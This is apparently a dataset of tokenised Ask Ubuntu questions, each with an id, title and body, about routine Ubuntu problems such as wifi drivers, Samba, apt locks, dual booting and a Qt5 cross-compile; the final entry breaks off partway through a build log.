333121	help with a simple bash script creation	the problem my 16gb liveusb session for ubuntu 12.04 does n't save certain settings/applications on the persistent section . i must shut down my laptop , thereby erasing everything stored on ram ( i am currently without a hard drive . ) the goal to write a script that : - will set power management for wlan0 to off - will await keyboard input from user ( as i must then join a wireless network ) - will then accept an input from any key to proceed - will download and install adobe flash - will download and install chromium browser *i will , then , transfer this script to the persistent section of my usb dongle . the question is this even possible and if so , how would i even get started ? i have no prior education in coding . however , i grasp the concept . all i 'm looking for is a little direction so that i may get started with programming an actual solution to my real-world problem . thanks in advance ! -andrew
333122	audio stuttering badly only when wifi is enabled	i recently fixed my lack of wifi buy installing new drivers from realtek ( see thread here : http : //ubuntuforums.org/showthread.php ? t=2166788 & page=2 ) . now i have another , possibly unrelated , problem . the wireless is now working great , but whenever it 's enabled , the sound behaves badly it stutters like a dirty cd . from any source or application , it 's the same . i 've searched the threads and found nothing obvious except one user who had the same problem ( unsolved ) . any help ? ubuntu 12.04 amd64 on a toshiba satellite proo c850 gerald @ geraldlaptoplinux : ~ $ lsmod | grep snd snd_hda_codec_hdmi 32476 1 snd_hda_codec_realtek 79855 1 snd_hda_intel 34063 5 snd_hda_codec 135141 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_i ntel snd_hwdep 17765 1 snd_hda_codec snd_pcm 97523 4 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13325 0 snd_rawmidi 30750 1 snd_seq_midi snd_seq_midi_event 14900 1 snd_seq_midi snd_seq 61931 2 snd_seq_midi , snd_seq_midi_event snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14498 3 snd_seq_midi , snd_rawmidi , snd_seq snd 83674 19 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_i ntel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , s nd_seq , snd_timer , snd_seq_device soundcore 15092 1 snd snd_page_alloc 18573 2 snd_hda_intel , snd_pcm gerald @ geraldlaptoplinux : ~ $ dmesg | grep snd [ 15.018424 ] snd_hda_intel 0000:00:1b.0 : irq 45 for msi/msi-x gerald @ geraldlaptoplinux : ~ $ ^c gerald @ geraldlaptoplinux : ~ $
333123	how can i fix a `` 403 '' error message when trying to install microsoft silverlight ?	please can someone help me so that i can watch bt sport on my linux laptop ? i ca n't download silverlight as i keep getting a 403 message .
333126	nvidia gtx titan change dp rate ?	i bought and installed two evga nvidia gtx titan cards in my ubuntu 12.04 ts box for hpc . i was disappointed with the benchmark results i got , see eigen-magma . i was actually expecting e.g . dgemm to deliver about 1.3 tflop/s but instead in my benchmarks it stayed short at 200 gflop/s with dgemm . however , after some additional research i learned that it is possible to change the double precision ( dp ) rate of the gtx titan card to 1/3th of the single precision ( sp ) see the last section `` i 'm a cheap tesla then ? '' first paragraph and that by default the titan will operate at 1/24th of the possible dp rate which is what i experienced in my benchmarks . the question is then how can i change the dp rate of a nvidia titan gtx card on ubuntu 12.04 ts ? i have the latest nvidia drivers installed .
333127	samba share not accessible from windows 7 ( on domain ) via hostname	i have spent several days attempting to solve this- none of the answers on this forum or any other were able to help . i tried everything . i read the entire samba manual . nothing worked . happily , i have solved it and would like to share the answer with the community . here was my specific issue : i have samba 3.6.3 running on ubuntu server 12.04 . the server is joined to my company domain with powerbroker identity services open edition ( they purchased likewise ) . i followed the manual and set up a share using ad group permissions . it was accessible from linux and mac using ad permissions . from windows 7 , it was accessible only on machines not joined to the domain . once joined to the domain it was only accessible via ip- short hostname and fqdn would respond with a password error .
333129	difference in the behavior of executable depending on where executed	i am trying to run repo from my home directory ( /home/jeffrey ) . the repo binary is in the bin directory under my home directory ( /home/jeffrey/bin ) . the bin directory is in path - i understand it as true because if i do echo $ path it returns : jeffrey @ jeffrey-satellite-m645 : ~/bin $ echo $ path /home/jeffrey/android-sdk-linux/platform-tools : /home/jeffrey/bin : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : jeffrey @ jeffrey-satellite-m645 : ~/bin $ so when i execute repo i get : jeffrey @ jeffrey-satellite-m645 : ~ $ repo error : repo is not installed . use `` repo init '' to install it here . jeffrey @ jeffrey-satellite-m645 : ~ $ but , if i run it from bin , i get : jeffrey @ jeffrey-satellite-m645 : ~/bin $ repo usage : repo command [ args ] the most commonly used repo commands are : abandon permanently abandon a development branch branch view current topic branches branches view current topic branches checkout checkout a branch for development cherry-pick cherry-pick a change . diff show changes between commit and working tree download download and checkout a change grep print lines matching a pattern ... my permissions on the folder is such : jeffrey @ jeffrey-satellite-m645 : ~ $ ls -l total 88 drwxrwxrwx 13 12275 5000 4096 jun 8 16:35 android-sdk-linux drwxr-xr-x 3 jeffrey jeffrey 4096 aug 15 13:56 bin why the difference in behavior ? edit : i believe the behavior is different because repo can not find it 's working folder , which is also in bin . so how do i execute repo from anywhere , but have it run in the directory it is pathed to ? okay , i scraped this from terminal just moments ago : repo has been initialized in /home/jeffrey/bin if this is not the directory in which you want to initialize repo , please run : rm -r /home/jeffrey/bin/.repo and try again . jeffrey @ jeffrey-satellite-m645 : ~/bin/android/aosp-4.0.4_r2.1 $ ls -l total 0 jeffrey @ jeffrey-satellite-m645 : ~/bin/android/aosp-4.0.4_r2.1 $ cd ~ jeffrey @ jeffrey-satellite-m645 : ~ $ repo error : repo is not installed . use `` repo init '' to install it here . jeffrey @ jeffrey-satellite-m645 : ~ $ in my understanding , repo is contradicting itself . on one hand it clearly states : repo has been initialized in /home/jeffrey/bin but , when i try to run it : jeffrey @ jeffrey-satellite-m645 : ~ $ repo error : repo is not installed . use `` repo init '' to install it here . jeffrey @ jeffrey-satellite-m645 : ~ $ i just do n't understand why it 's not working as advertised ! ? furthermore : git is installed : jeffrey @ jeffrey-satellite-m645 : ~ $ git -- version git version 1.7.9.5 jeffrey @ jeffrey-satellite-m645 : ~ $ apt-cache policy git git : installed : 1:1.7.9.5-1 candidate : 1:1.7.9.5-1 version table : *** 1:1.7.9.5-1 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main amd64 packages 100 /var/lib/dpkg/status and i have actually executed repo init per the output supplied .
333133	how to set app icon in the .desktop file of an ubuntu touch application ?	i am learning the ubuntu sdk , and i have make an new html5 touch ui project with qt creator . the project folder has an .desktop file . i then added an launcher.png to my project 's folder . here is my .desktop file : [ desktop entry ] name=myapp startupnotify=true icon=/usr/share/myapp/launcher.png mimetype=text/plain ; nodisplay=true comment=something ... exec=/usr/bin/qmlscene $ @ /usr/share/myapp/diaspora-webclient.qml terminal=false type=application x-ubuntu-touch=true now i press ctrl+r to run the app with qmlscene . the app runs , but launcher.png is not displayed as the app 's icon in the unity launcher . do i need to run an command to update the changes ? or do i need to move the launcher.png to /usr/share/myapp/launcher.png via in-app-code ?
333136	how to print from sites that normally require os x or windows ?	i have been trying to get the target ( retail store ) website to print coupons . when i click print , it tells me it does not recognize my operating system and i need mac os x or windows . how do i get these sites to work ?
333140	samba server does n't appear to work on system restart	i finally got a samba file server setup successfully and connected to it and could transfer files fine . i mapped it as a network drive on several windows computers . i shut it down for the night as it is not yet in its permanent air conditioned spot ( would get too hot where it was if left running ) . today , when i turned it on , when i tried to connect , it could n't connect . is there something i must do server side every time i restart the system ?
333143	authenticate in ubuntu	i have a administrator privileges in ubuntu 12.10 but when i try to install some applications ubuntu requiere authentication , i write my password , but does n't work somebody could help me ?
333150	failed to install `` calendar for libreoffice '' in 12.04	if anyone know what these errors mean , please enlighten everyone , thanks !
333152	why did kde 4.11 from ppa remove kwin-style-qtcurve ?	when installing kde 4.11 from backports ppa , i noticed it removed kwin-style-qtcurve . after the update ( all went fine ) , i tried to install it and it wanted to remove kwin . why ?
333159	thumbnails not showing on desktop after upgrading to xubuntu 13.04	i used to be running xubuntu 12.10 , and i just upgraded to xubuntu 13.04 ( phew , that took a while ... ) the first thing i noticed after logging in to my account was that the thumbnails were missing ! i checked in the desktop properties : and thumbnails were enabled . yet my desktop looked like this : thumbnails are still seen in thunar , though : what is the problem here ? any ideas ?
333162	how do i set startup/ home page to a desired website ?	how do i set up the start up page to the desired website ? automatically goes to google search . not sure how to adjust .
333170	how do i install open vswitch ?	how do i install open vswitch on raring ? i ca n't find any official ubuntu docs on this anywhere . devstack seems to do this : kernel_version=`cat /proc/version | cut -d `` `` -f3` apt-get install make fakeroot dkms openvswitch-switch openvswitch-datapath-dkms linux-headers- $ kernel_version on the other hand , this blog does this : apt-get install openvswitch-datapath-source openvswitch-common openvswitch-switch
333175	i ca n't get my snow leopard mac to boot from thumb drive	i downloaded the iso and made it an img ( dmg ) . now the macbook says that it ca n't recognize the drive , and it does n't show up for me to boot from system preferences or when i reboot with the option key !
333178	how do i see/disconnect connected users vino-server from command line on remote machine thru ssh terminal ?	how do i see and disconnect connected users of vino-server screen sharing from the command line on remote machine thru ssh terminal ? i want something similar to w command for ssh .
333186	markdown ( md ) and restructuredtext ( rst ) editor	i am in search of a simple wysiwyg / rich text editor which can save the file in markdown or restructuredtext format . preferrably both . is there such a tool which runs on ubuntu ? thank you .
333194	ubuntu 13.04 ca n't see my realtek wifi card	i 've got a realtek wifi card about which terminal says , 03:01.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8190 802.1 in my dell vostro 220 . windows 7 uses it fine , but ubuntu ca n't seem to see it . i set up a wifi connection in the network prefs but it does n't show up in the drop-down network menu in the upper right corner of the screen . 99 % of the questions i see asked about this online are answered either with questions or with instructions to go to system settings - > software & updates - > additional drivers , where i imagine one is expected to find something but i find nothing - the box in that pref pane tab is empty . i update the os every time updates are reported and i last updated it about five minutes ago . i 've downloaded drivers from realtek 's site , but i 'm new to linux ( and the ridiculous amount of work it requires you to do in order to accomplish the simplest tasks ) and i have no idea which version of an archive to download nor what to do with all those files in the archive once i expand it . can somebody help with this ? preferably in some way i can understand without a degree in computer science ? i want to use this os , not spend the rest of my life learning how to make it function . thank you .
333205	how to jail break uefi to run ubuntu ?	the issue is how the unified extensible firmware interface ( uefi ) secure boot ( protocol ) v2.3.1 that microsoft has mandated for all windows 8 64bit systems illegally blocks boot loading software ( such as free and legal ubuntu ) from being loaded unless a microsoft or one of it’s affiliates ( collaborators ) has digitally sign ( cryptographic signature ) your code with their uefi signing key ( kek certificate which is a der encoded binary x509 v3 certificate ) stored in the firmware . why should ubuntu developers or any other free software developer be held hostage and forced to pay microsoft any fee for the right and privilege of running our own software ? no to mention there is no centralized signing authority to provide uefi keys . microsoft has made itself the only authority ( gatekeeper ) holding all the master keys . i want to point out there is no such thing as “windows hardware” because microsoft does not manufacture lenovo , sony , toshiba , acer , asus , msi , via , hp , dell , celvo , sager , etc… this is microsoft extending its own brand ( software ) upon firmware , claiming it’s their platform . why do the manufactures accept this theft of their hardware product ?
333212	executing script from shell problem	lubuntu raring ringtail . i want to be able to execute my scripts with ./ i start my python script with # ! /usr/bin/python and it says bash : ./myscript.py : /usr/bin/python^m : bad interpreter : no such file or directory if i use # ! /usr/bin/env python it gives a similar error : : no such file or directory what am i doing wrong ? i absolutely have python installed , and can run the scripts as normal with python myscript.py
333213	dualboot ubuntu ( 13.04 ) + windows 8 in efi mode . ca n't see dualboot screen ( screen completely black ) or bios screen , among other problems	i recently attempted to dualboot ubuntu 13.04 with windows 8 in efi mode on a lenovo ideapad u510 . the installation went unhitched , but after restarting , i ran into a couple of problems . 1 ) the laptop screen will not display anything upon bootup , including the dualboot screen , bios , etc . as of this moment , i can boot into ubuntu just by hitting enter blindly , but i have not been able to boot into windows 8 . 2 ) the laptop screen remains blank when ubuntu has fully loaded . interestingly , it will display everything expected on a second , much larger , external monitor . this essentially renders the portability of a laptop moot . 3 ) the laptop has an inability to connect to some secured wi-fi networks , despite authentication being correct . attempts to connect are met with the authentication window popping up in regular intervals . at the moment , i would appreciate it if people could help me fix my problem of not seeing anything upon powering up and entering the invisible boot screen . i would like to keep the dualboot , as i like ubuntu for its ease of use for developing , but would also like tips as to how to uninstall this dualboot and return to windows 8 , worst comes to worst .
333214	is there any app for voice recording on ubuntu touch phone ?	i am working on voice over sensor networks project.for this i need to give the voice data to the network by ubuntu touch phone ( nexus 4 ) through datacable.can anybody suggest any app for my project ? ? ?
333219	ca n't install codecs ( could not get lock /var/lib/dpkg/lock )	i used the commands at the end of this article to try installing the restricted extras the article recommends . http : //www.webupd8.org/2013/04/7-things-to-do-after-installing-ubuntu.html sudo apt-get install ubuntu-restricted-extras when i input this command in the terminal , i receive the following error message : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? rick @ rick-xps-l521x : ~ $ sudo apt-get install ubuntu-restricted-extras e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? rick @ rick-xps-l521x : ~ $ sudo apt-get install libavformat-extra-53 libavcodec-extra-53 e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? rick @ rick-xps-l521x : ~ $ sudo apt-get install ubuntu-restricted-extras [ sudo ] password for rick : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? the first time i tried installing the restricted extras , the terminal brought me to a legal approval page which ended with no way to agree or not agree to the terms . so i exited and tried to install again but then received the error message . how do i fix this ?
333220	regarding file copying in ubuntu 12.04	i have to replace my hard disk drive ( not a usb type hdd , 500gb ) so i have backed up content to some other hardisk ( not a usb hdd , 80gb ) . then i brought a new hdd also installed ubuntu 12.04 & windowns xp after installation i have connected my new hard disk ( 500gb ) to computer having 80gb hdd . and copied all the files to /home/myname/backup after copying i have removed hdd and placed in my computer , but i was not able to see backup folder , set permission to 777 ( with -r ) , but i was only able to see files while i was booted with live cd as the owner of the file was ubuntu live cd question how can i access my files without live cd solution worked for me copyed files to ntfs / fat partition in my hard disk , for my kndowledge i would like to know an alternate solution .
333226	how to change the session language on login in ubuntu 13.04	in older versions of ubuntu it was possible to change the language ( if language packs were installed ) during the login . therefore the login-window showed a drop-down menu with all installed languages . now i 'm using ubuntu 13.04 and i 'm not able to find this drop-down menu . i only found the possibility to switch the keyboard layout . has this ( useful ) feature been removed ? do i need to install additional software to get the `` language switch '' back ?
333227	type french accents with us international keyboard	i am running lubuntu on my laptop and would like to write french accents with a us keyboard . i find the compose key solution ( [ alt ] + [ accent ] at the same time , followed by a [ letter ] ) not that handy ... on windows , there is a better solution : switch the keyboard layout to us-international and then type [ ` ] followed by [ a ] to display [ à ] . still on windows , the software easytype makes it even easier : press once [ e ] to get [ e ] , twice [ e ] to get [ é ] , three times [ e ] to get [ è ] ... is there a way to achieve that on lubuntu ? with a script or something ? ps : my keyboard is vietnamese , but exactly corresponds to the us keyboard .
333228	where can i get ubuntu stickers	where can i get ubuntu inside or powered by ubuntu or any ubuntu sticker for that matter to stick on my laptops ?
333237	difference between unity and gnome	i often come across the terms unity and gnome while reading about ubuntu . i understand that unity is the default desktop environment for ubuntu . what is gnome and how is it related to/different from unity ?
333240	how to change settings in 3g usb modem from ubuntu ?	i am using reliance netconnect+ ( zte manufactured ) . i can connect to the internet . but if i want to change the mode from one to another ( hsd , hybrid and 1x are the three modes ) i have to go to windows os , change the mode there and then i have to connect in the ubuntu .
333244	ubuntu 12.04 does n't shutdown	i am a ubuntu newbie . i installed ubuntu 12.04 on my lenovo ideapad s205 3 days ago . installation and working is no problem but it does n't power off on shutdown . hard disk activity goes off but the fan and screen stays on . i have seen a few threads here that pointed out this issue . i tried some of the options that have worked for some users like using `` shutodwn '' and `` poweroff '' commands and installing certain updates . however , none of them worked for me ( which is why i am posting this obviously ) . please help .
333250	how to automatically install applications/commands when they are run in the terminal ?	when you enter a command for an application in ubuntu in the terminal and the application in not installed on the system then you get a message saying the program 'application name ' is currently not installed . you can install it by typing : sudo apt-get install < application name > how do you get it to automatically type the above command for you or get it to ask you do you want to install < application name > for example : say you type firefox in the terminal window and firefox is not installed in the system than it will say , the program 'firefox ' is currently not installed . you can install it by typing : sudo apt-get install firefox . how do you get it automatically type the command sudo apt-get install firefox and press enter for you .
333256	how to skip `` execute file '' dialog in lubuntu ( pcmanfm )	when i click on an executable file in pcmanfm ( default file manager in lubuntu ) , i get an “execute file” dialog with three options ( execute , execute in terminal , cancel ) . is there a way to set default action ( e.g . execute ) in order to skip annoying “execute file” dialog ?
333259	accessing webmin from ubuntu server 12.04lts	i have installed webmin 1.630 on my ubuntu server . it says i have to access https//ubuntumyname:1000 : / i have lynx web browser intalled so i ran the command lynx https//ubuntumyname:1000 : / it responds with unable to locate remote host . i have checked similar problems concerning this issue raised by others but still there is no solution to my problem .
333261	ubuntu 12.04 php pear package problem	i am using lamp server on my ubuntu 12.04 system . before this time i have installed prestashop without any issues . but after a long time when i tried to install prestashop today , it really showed me a strange error . the error is like this : warning : require ( /var/www/prestashop/config/config.inc.php ) : failed to open stream : permission denied in /var/www/prestashop/index.php on line 27 fatal error : require ( ) : failed opening required '/var/www/prestashop/config/config.inc.php ' ( include_path= ' . : /usr/share/php : /usr/share/pear/pear ' ) in /var/www/prestashop/index.php on line 27 for that i decided to debug the error so i went through many blogs and forums and i checked my php.ini file . the file is like this . after going through many blogs someone had said that the error is for php pear package the link is here . after that i just made edit my php.ini pear url like this : ; unix : `` /path1 : /path2 '' include_path = `` . : /usr/share/php : /usr/share/php/pear '' after that i just restarted my apache server but it did not worked for me . the same error is coming . so here can someone kindly tell me what 's the issue here ? and how to solve this ?
333264	user defined upstart jobs using openbox	i know that to enable user defined jobs for upstart you need to uncomment ubuntu in /etc/upstart-xsessions and this will allow user defined upstart jobs in ubuntu default xsession . the question is how to enable user defined upstart jobs using different session ( e.g . openbox ) i thought that this should be as easy as adding openbox line to /etc/upstart-xsessions . but after adding this line openbox just hangs during startup and i end up with having no window manager at all .
333267	how to install git in lubuntu ( apt is `` unable to locate package libcur14-gnutls-dev '' ) ?	i 've tried to install git to my laptop which runs lubuntu.i followed the pattern on git website and it says : to install git , you need to have the following libraries that git depends on : curl , zlib , openssl , expat , and libiconv $ apt-get install libcurl4-gnutls-dev libexpat1-dev gettext \ libz-dev libssl-dev however when i typed it , i got this : gwapps @ gwapps-thinkpad-x61 : ~ $ sudo apt-get install libcur14-gnutls-dev libexpat1-dev gettext libz-dev libssl-dev reading package lists ... done building dependency tree reading state information ... done note , selecting 'zlib1g-dev ' instead of 'libz-dev' e : unable to locate package libcur14-gnutls-dev gwapps @ gwapps-thinkpad-x61 : ~ $ does anyone know what is wrong and what should i do ?
333274	private key not found	i have tried to generate server certificate for apache2 earlier ... . i have noticed one error in apache server . which means that apache ca n't find the private key component of new ssl certificate . now i want to remove the server certificate . command : root @ wiffyspot1 : # /etc/init.d/apache2 restart * restarting web server apache2 action 'start ' failed . i have check the apache error log : [ error ] init : private key not found [ wed aug 14 11:00:50 2013 ] [ error ] ssl library error : 218529960 error:0d0680a8 : asn1 encoding routines : asn1_check_tlen : wrong tag [ wed aug 14 11:00:50 2013 ] [ error ] ssl library error : 218640442 error:0d08303a : asn1 encoding routines : asn1_template_noexp_d2i : nested asn1 error [ wed aug 14 11:00:50 2013 ] [ error ] ssl library error : 218529960 error:0d0680a8 : asn1 encoding routines : asn1_check_tlen : wrong tag [ wed aug 14 11:00:50 2013 ] [ error ] ssl library error : 218595386 error:0d07803a : asn1 encoding routines : asn1_item_ex_d2i : nested asn1 error [ wed aug 14 11:00:50 2013 ] [ error ] ssl library error : 67710980 error:04093004 : rsa routines : old_rsa_priv_decode : rsa lib [ wed aug 14 11:00:50 2013 ] [ error ] ssl library error : 218529960 error:0d0680a8 : asn1 encoding routines : asn1_check_tlen : wrong tag [ wed aug 14 11:00:50 2013 ] [ error ] ssl library error : 218595386 error:0d07803a : asn1 encoding routines : asn1_item_ex_d2i : nested asn1
333276	wireless network connectivity is not working	hi i have a dell inspiron 6400 and have been running ubuntu 12.04.2 lts alongside windows for a few months . i decided to get rid of windows and move over to ubuntu completely yesterday and started with a clean install . since then my laptop wo n't connect to the wireless network and when i try and use the different fixes online it stops connecting via the ethernet cable as well . i have the broadcom bcm 4311 network adapter and i have tried installing the sta driver that ubuntu suggests . as well as running the terminal commands to uninstall the bcmwl-b43 and then install the firmware-b43-installer and b43-fwcutter . i 'm sure it 's an easy fix that i am overlooking but i really need someone 's help with this .
333277	qt5.0 cross compile for am1808	i have a requirement to implement the json for file transfer . i found that qjsondocument is only supported to the qt5.0 . so that i am trying to cross compile the qt5.0 for my processor ( am1808 arm9 ) . i am using ubuntu v12.10 . i am using arm-none-gnueabi-gcc toolchain to cross compile it . i have tried to cross compile it using the following configure command . ./configure -prefix /home/ -release -make libs -xplatform mkspecs/linux-arm-gnueabi-g++ -confirm-license -opensource -no-xcb -make examples -verbose i am getting an error like following : < < srcbase > = /opt/qt-everywhere-opensource-src-5.0.2/qtbase < outbase > = /opt/qt-everywhere-opensource-src-5.0.2/qtbase creating qmake ... make : nothing to be done for `first ' . running configuration tests ... warning : disabling pkg-config since pkg_config_libdir is not set . warning : disabling pkg-config since pkg_config_sysroot_dir is not set . determining architecture ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -g -wall -w -fpie -i../../mkspecs/linux-arm-gnueabi-g++ -i . -o arch.o arch.cpp arm-none-linux-gnueabi-g++ -o arch arch.o { test -n `` '' & & destdir= '' '' || destdir= . ; } & & test $ ( gdb -- version | sed -e 's , [ ^0-9 ] \+\ ( [ 0-9 ] \ ) \.\ ( [ 0-9 ] \ ) . * , \1\2 , ; q ' ) -gt 72 & & gdb -- nx -- batch -- quiet -ex 'set confirm off ' -ex `` save gdb-index $ destdir '' -ex quit 'arch ' & & test -f arch.gdb-index & & arm-none-linux-gnueabi-objcopy -- add-section '.gdb_index=arch.gdb-index ' -- set-section-flags '.gdb_index=readonly ' 'arch ' 'arch ' & & rm -f arch.gdb-index || true found architecture in binary cfg_arch= '' arm '' cfg_cpufeatures= '' '' determining architecture ... ( ) g++ -c -pipe -g -wall -w -fpie -i../../mkspecs/linux-g++ -i . -o arch.o arch.cpp g++ -o arch arch.o { test -n `` '' & & destdir= '' '' || destdir= . ; } & & test $ ( gdb -- version | sed -e 's , [ ^0-9 ] \+\ ( [ 0-9 ] \ ) \.\ ( [ 0-9 ] \ ) . * , \1\2 , ; q ' ) -gt 72 & & gdb -- nx -- batch -- quiet -ex 'set confirm off ' -ex `` save gdb-index $ destdir '' -ex quit 'arch ' & & test -f arch.gdb-index & & objcopy -- add-section '.gdb_index=arch.gdb-index ' -- set-section-flags '.gdb_index=readonly ' 'arch ' 'arch ' & & rm -f arch.gdb-index || true found architecture in binary cfg_host_arch= '' i386 '' cfg_host_cpufeatures= '' '' system architecture : 'arm' host architecture : 'i386' c++11 auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -std=c++0x -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o c++11.o c++11.cpp arm-none-linux-gnueabi-g++ -wl , -o1 -o c++11 c++11.o c++11 enabled . floatmath auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o floatmath.o floatmath.cpp floatmath.cpp:44:5 : warning : unused parameter 'argc ' [ -wunused-parameter ] floatmath.cpp:44:5 : warning : unused parameter 'argv ' [ -wunused-parameter ] arm-none-linux-gnueabi-g++ -wl , -o1 -o floatmath floatmath.o floatmath enabled . sse2 auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -msse2 -g -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o sse2.o sse2.cpp cc1plus : error : unrecognized command line option '-msse2' make : *** [ sse2.o ] error 1 sse2 disabled . sse3 auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -msse3 -g -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o sse3.o sse3.cpp cc1plus : error : unrecognized command line option '-msse3' make : *** [ sse3.o ] error 1 sse3 disabled . ssse3 auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -mssse3 -g -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o ssse3.o ssse3.cpp cc1plus : error : unrecognized command line option '-mssse3' make : *** [ ssse3.o ] error 1 ssse3 disabled . sse4_1 auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -msse4.1 -g -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o sse4_1.o sse4_1.cpp cc1plus : error : unrecognized command line option '-msse4.1' make : *** [ sse4_1.o ] error 1 sse4_1 disabled . sse4_2 auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -msse4.2 -g -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o sse4_2.o sse4_2.cpp cc1plus : error : unrecognized command line option '-msse4.2' make : *** [ sse4_2.o ] error 1 sse4_2 disabled . avx auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -mavx -g -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o avx.o avx.cpp cc1plus : error : unrecognized command line option '-mavx' make : *** [ avx.o ] error 1 avx disabled . neon auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -mfpu=neon -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o neon.o neon.cpp in file included from neon.cpp:42:0 : /opt/arm-2012.03/bin/../lib/gcc/arm-none-linux-gnueabi/4.6.3/include/arm_neon.h:32:2 : error : # error you must enable neon instructions ( e.g . -mfloat-abi=softfp -mfpu=neon ) to use arm_neon.h neon.cpp : in function 'int main ( int , char** ) ' : neon.cpp:46:5 : error : 'int32x4_t ' was not declared in this scope neon.cpp:46:15 : error : expected ' ; ' before 'null' neon.cpp:49:29 : error : 'null ' was not declared in this scope neon.cpp:49:36 : error : 'vst1q_lane_s32 ' was not declared in this scope make : *** [ neon.o ] error 1 neon disabled . zlib auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o zlib.o zlib.cpp zlib.cpp:42:18 : fatal error : zlib.h : no such file or directory compilation terminated . make : *** [ zlib.o ] error 1 zlib disabled . libjpeg auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o libjpeg.o libjpeg.cpp libjpeg.cpp:45:21 : fatal error : jpeglib.h : no such file or directory compilation terminated . make : *** [ libjpeg.o ] error 1 libjpeg disabled . libpng auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o libpng.o libpng.cpp libpng.cpp:42:17 : fatal error : png.h : no such file or directory compilation terminated . make : *** [ libpng.o ] error 1 libpng disabled . db2 auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o db2.o db2.cpp db2.cpp:42:20 : fatal error : sqlcli.h : no such file or directory compilation terminated . make : *** [ db2.o ] error 1 db2 disabled . interbase auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o ibase.o ibase.cpp ibase.cpp:42:19 : fatal error : ibase.h : no such file or directory compilation terminated . make : *** [ ibase.o ] error 1 interbase disabled . mysql ( thread-safe ) auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o mysql.o ../mysql/mysql.cpp ../mysql/mysql.cpp:42:19 : fatal error : mysql.h : no such file or directory compilation terminated . make : *** [ mysql.o ] error 1 mysql ( thread-safe ) disabled . mysql ( thread-unsafe ) auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o mysql.o mysql.cpp mysql.cpp:42:19 : fatal error : mysql.h : no such file or directory compilation terminated . make : *** [ mysql.o ] error 1 mysql ( thread-unsafe ) disabled . oci auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o oci.o oci.cpp oci.cpp:42:17 : fatal error : oci.h : no such file or directory compilation terminated . make : *** [ oci.o ] error 1 oci disabled . odbc auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o odbc.o odbc.cpp odbc.cpp:45:17 : fatal error : sql.h : no such file or directory compilation terminated . make : *** [ odbc.o ] error 1 odbc disabled . iodbc auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o iodbc.o iodbc.cpp iodbc.cpp:42:17 : fatal error : sql.h : no such file or directory compilation terminated . make : *** [ iodbc.o ] error 1 iodbc disabled . postgresql auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie -i../../../mkspecs/linux-arm-gnueabi-g++ -i . -o psql.o psql.cpp psql.cpp:42:22 : fatal error : libpq-fe.h : no such file or directory compilation terminated . make : *** [ psql.o ] error 1 postgresql disabled . sqlite2 auto-detection ... ( ) arm-none-linux-gnueabi-g++ -c -pipe -o2 -wall -w -fpie 